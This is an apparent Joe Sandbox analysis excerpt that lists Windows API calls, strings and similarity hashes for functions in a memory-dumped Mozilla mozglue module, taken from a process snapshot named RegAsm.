                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC477C5), ref: 6CC9C298
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle), ref: 6CC9C2B7
                                                                            • FreeLibrary.KERNEL32(?,6CC477C5), ref: 6CC9C2CC
                                                                            Strings
                                                                            • wintrust.dll, xrefs: 6CC9C293
                                                                            • CryptCATAdminCalcHashFromFileHandle, xrefs: 6CC9C2B1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminCalcHashFromFileHandle$wintrust.dll
                                                                            • API String ID: 145871493-1423897460
                                                                            • Opcode ID: 9ac4e1da2295e261816f421e4870174151b3b63ea2475a35e2c15ca6c8059384
                                                                            • Instruction ID: 22693c313599fa5b7bba1ec44057a73efbe3959b4ee393bb913a7c016af343bc
                                                                            • Opcode Fuzzy Hash: 9ac4e1da2295e261816f421e4870174151b3b63ea2475a35e2c15ca6c8059384
                                                                            • Instruction Fuzzy Hash: 01E0927C2453019FDF006FE9C9587027BF8EB07304F440015A90991B60E7B28400CA59
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(kernelbase.dll,?,6CC405BC), ref: 6CC9BAB8
                                                                            • GetProcAddress.KERNEL32(00000000,VirtualAlloc2), ref: 6CC9BAD7
                                                                            • FreeLibrary.KERNEL32(?,6CC405BC), ref: 6CC9BAEC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: VirtualAlloc2$kernelbase.dll
                                                                            • API String ID: 145871493-1188699709
                                                                            • Opcode ID: 4d57459089094487dbcfaa10be7217c7e17b2296683dfc165a334f37864261c7
                                                                            • Instruction ID: f22b3bd1483651223e18f82dd4b4653c010d7634243b07a83f93fe8e15e54be5
                                                                            • Opcode Fuzzy Hash: 4d57459089094487dbcfaa10be7217c7e17b2296683dfc165a334f37864261c7
                                                                            • Instruction Fuzzy Hash: 6DE0B67C6053C2AFDF129FE6D969706BBF8A707208F14001AB90991750FBBA88548B28
                                                                            APIs
                                                                            • LoadLibraryW.KERNEL32(wintrust.dll,?,6CC477F6), ref: 6CC9C248
                                                                            • GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext), ref: 6CC9C267
                                                                            • FreeLibrary.KERNEL32(?,6CC477F6), ref: 6CC9C27C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: CryptCATAdminAcquireContext$wintrust.dll
                                                                            • API String ID: 145871493-3357690181
                                                                            • Opcode ID: 1fe2f5d1e798f6d9aace20f3d2a2c1d74146fba07a055ac1e6816ee3caee978c
                                                                            • Instruction ID: 9750f24c8266d4207b7a4b2c297eaa1fa43cedef32095a277488dbbd6eb4e7d1
                                                                            • Opcode Fuzzy Hash: 1fe2f5d1e798f6d9aace20f3d2a2c1d74146fba07a055ac1e6816ee3caee978c
                                                                            • Instruction Fuzzy Hash: D6E0B67C2043099FDF046FE2D898B027FF8E70B30AF104055E905D2750E7B284409F59
                                                                            APIs
                                                                            • memset.VCRUNTIME140(?,00000000,?,?,6CC9BE49), ref: 6CC9BEC4
                                                                            • RtlCaptureStackBackTrace.NTDLL ref: 6CC9BEDE
                                                                            • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CC9BE49), ref: 6CC9BF38
                                                                            • RtlReAllocateHeap.NTDLL ref: 6CC9BF83
                                                                            • RtlFreeHeap.NTDLL(6CC9BE49,00000000), ref: 6CC9BFA6
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                            • String ID:
                                                                            • API String ID: 2764315370-0
                                                                            • Opcode ID: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                            • Instruction ID: 8a86a363faa782c4c098ccf222a2f50d9a735a636dd1f8795293fe31ed1f7d9e
                                                                            • Opcode Fuzzy Hash: 13c1726869c39de2c7cb3a8f289b194f4574953783f52e91698aeb832841d98a
                                                                            • Instruction Fuzzy Hash: 9F519376B002159FE724CF69CD90B9AB3A6FF84314F294639D51AA7B54E730F9068B80
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88E6E
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88EBF
                                                                            • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F24
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?,6CCAD734), ref: 6CC88F46
                                                                            • free.MOZGLUE(?,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F7A
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6CC7B58D,?,?,?,?,?,?,?,6CCAD734,?,?,?), ref: 6CC88F8F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            • Opcode ID: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                            • Instruction ID: 3996c22df2696e7c95a5e473bbe47d7e6a0046f0772a66803eab0eb555d8813e
                                                                            • Opcode Fuzzy Hash: d42b4b7b850b26f8ca7545d2284dc1bb8744d043945684070f58be811e1cb552
                                                                            • Instruction Fuzzy Hash: 855191B5A022168FEB14CF58D880A6F7BB2BF4431CF55052AD516ABB40F731F905CBA1
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC460F4
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46180
                                                                            • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46211
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CC46229
                                                                            • free.MOZGLUE(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC4625E
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6CC45FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CC46271
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            APIs
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8284D
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8289A
                                                                            • free.MOZGLUE(?,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC828F1
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC82910
                                                                            • free.MOZGLUE(00000001,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8293C
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CC82620,?,?,?,6CC760AA,6CC75FCB,6CC779A3), ref: 6CC8294E
                                                                            Similarity
                                                                            • API ID: freemalloc
                                                                            • String ID:
                                                                            • API String ID: 3061335427-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBE784), ref: 6CC3CFF6
                                                                            • LeaveCriticalSection.KERNEL32(6CCBE784), ref: 6CC3D026
                                                                            • VirtualAlloc.KERNEL32(00000000,00100000,00001000,00000004), ref: 6CC3D06C
                                                                            • VirtualFree.KERNEL32(00000000,00100000,00004000), ref: 6CC3D139
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CriticalSectionVirtual$AllocEnterFreeLeave
                                                                            • String ID: MOZ_CRASH()
                                                                            • API String ID: 1090480015-2608361144
                                                                            APIs
                                                                            • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6CC34E5A
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6CC34E97
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC34EE9
                                                                            • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC34F02
                                                                            • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6CC34F1E
                                                                            Similarity
                                                                            • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                            • String ID:
                                                                            • API String ID: 713647276-0
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,6CC45820,?), ref: 6CC7D21F
                                                                            • moz_xmalloc.MOZGLUE(00000001,?,?,6CC45820,?), ref: 6CC7D22E
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,6CC45820,?), ref: 6CC7D242
                                                                            • free.MOZGLUE(00000000,?,?,?,?,?,?,6CC45820,?), ref: 6CC7D253
                                                                              • Part of subcall function 6CC55E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CC55EDB
                                                                              • Part of subcall function 6CC55E90: memset.VCRUNTIME140(6CC97765,000000E5,55CCCCCC), ref: 6CC55F27
                                                                              • Part of subcall function 6CC55E90: LeaveCriticalSection.KERNEL32(?), ref: 6CC55FB2
                                                                            • memcpy.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,6CC45820,?), ref: 6CC7D280
                                                                            Similarity
                                                                            • API ID: CriticalSectionmemset$EnterLeavefreemallocmemcpymoz_xmallocstrlen
                                                                            • String ID:
                                                                            • API String ID: 2029485308-0
                                                                            APIs
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC4C1BC
                                                                            • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC4C1DC
                                                                            Similarity
                                                                            • API ID: Now@Stamp@mozilla@@TimeV12@_strlen
                                                                            • String ID:
                                                                            • API String ID: 1885715127-0
                                                                            APIs
                                                                            • EnterCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A858
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A87B
                                                                              • Part of subcall function 6CC9A9D0: memcpy.VCRUNTIME140(?,?,00000400,?,?,?,6CC9A88F,00000000), ref: 6CC9A9F1
                                                                            • _ltoa_s.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,00000020,0000000A), ref: 6CC9A8FF
                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC9A90C
                                                                            • LeaveCriticalSection.KERNEL32(6CCBF770), ref: 6CC9A97E
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrlen$EnterLeave_ltoa_smemcpy
                                                                            • String ID:
                                                                            • API String ID: 1355178011-0
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(-00000002,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC4159C
                                                                            • memcpy.VCRUNTIME140(00000023,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415BC
                                                                            • moz_xmalloc.MOZGLUE(-00000001,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC415E7
                                                                            • free.MOZGLUE(?,?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41606
                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6CC4152B,?,?,?,?,6CC41248,?), ref: 6CC41637
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                            • String ID:
                                                                            • API String ID: 733145618-0
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AD9D
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9ADAC
                                                                            • free.MOZGLUE(?,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE01
                                                                            • GetLastError.KERNEL32(?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE1D
                                                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6CCAE330,?,6CC5C059), ref: 6CC9AE3D
                                                                            Similarity
                                                                            • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 3161513745-0
                                                                            APIs
                                                                            • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6CCADCA0,?,?,?,6CC6E8B5,00000000), ref: 6CC95F1F
                                                                            • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95F4B
                                                                            • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6CC6E8B5,00000000), ref: 6CC95F7B
                                                                            • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6CC6E8B5,00000000), ref: 6CC95F9F
                                                                            • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6CC6E8B5,00000000), ref: 6CC95FD6
                                                                            Similarity
                                                                            • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                            • String ID:
                                                                            • API String ID: 1389714915-0
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 6CC3B532
                                                                            • moz_xmalloc.MOZGLUE(?), ref: 6CC3B55B
                                                                            • memset.VCRUNTIME140(00000000,00000000,?), ref: 6CC3B56B
                                                                            • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6CC3B57E
                                                                            • free.MOZGLUE(00000000), ref: 6CC3B58F
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                            • String ID:
                                                                            • API String ID: 4244350000-0
                                                                            APIs
                                                                            • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6CC3B7CF
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B808
                                                                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?), ref: 6CC3B82C
                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC3B840
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC3B849
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$?vprint@PrintfTarget@mozilla@@mallocmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1977084945-0
                                                                            APIs
                                                                            • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6CC96E78
                                                                              • Part of subcall function 6CC96A10: InitializeCriticalSection.KERNEL32(6CCBF618), ref: 6CC96A68
                                                                              • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96A7D
                                                                              • Part of subcall function 6CC96A10: GetCurrentProcess.KERNEL32 ref: 6CC96AA1
                                                                              • Part of subcall function 6CC96A10: EnterCriticalSection.KERNEL32(6CCBF618), ref: 6CC96AAE
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96AE1
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6CC96B15
                                                                              • Part of subcall function 6CC96A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6CC96B65
                                                                              • Part of subcall function 6CC96A10: LeaveCriticalSection.KERNEL32(6CCBF618,?,?), ref: 6CC96B83
                                                                            • MozFormatCodeAddress.MOZGLUE ref: 6CC96EC1
                                                                            • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EE1
                                                                            • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6CC96EED
                                                                            • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6CC96EFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                            • String ID:
                                                                            • API String ID: 4058739482-0
                                                                            APIs
                                                                            • WideCharToMultiByte.KERNEL32 ref: 6CC976F2
                                                                            • moz_xmalloc.MOZGLUE(00000001), ref: 6CC97705
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CC97717
                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6CC9778F,00000000,00000000,00000000,00000000), ref: 6CC97731
                                                                            • free.MOZGLUE(00000000), ref: 6CC97760
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
                                                                            • String ID:
                                                                            • API String ID: 2538299546-0
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6CC33DEF), ref: 6CC70D71
                                                                            • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6CC33DEF), ref: 6CC70D84
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CC33DEF), ref: 6CC70DAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Virtual$Free$Alloc
                                                                            • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                            • API String ID: 1852963964-2186867486
                                                                            APIs
                                                                            • WaitForSingleObject.KERNEL32(000000FF), ref: 6CC9586C
                                                                            • CloseHandle.KERNEL32 ref: 6CC95878
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6CC95898
                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC958C9
                                                                            • free.MOZGLUE(00000000), ref: 6CC958D3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: free$CloseHandleObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 1910681409-0
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6CC875C4,?), ref: 6CC8762B
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87644
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8765A
                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87663
                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6CC874D7,6CC915FC,?,?,?), ref: 6CC87677
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                             • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                             • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
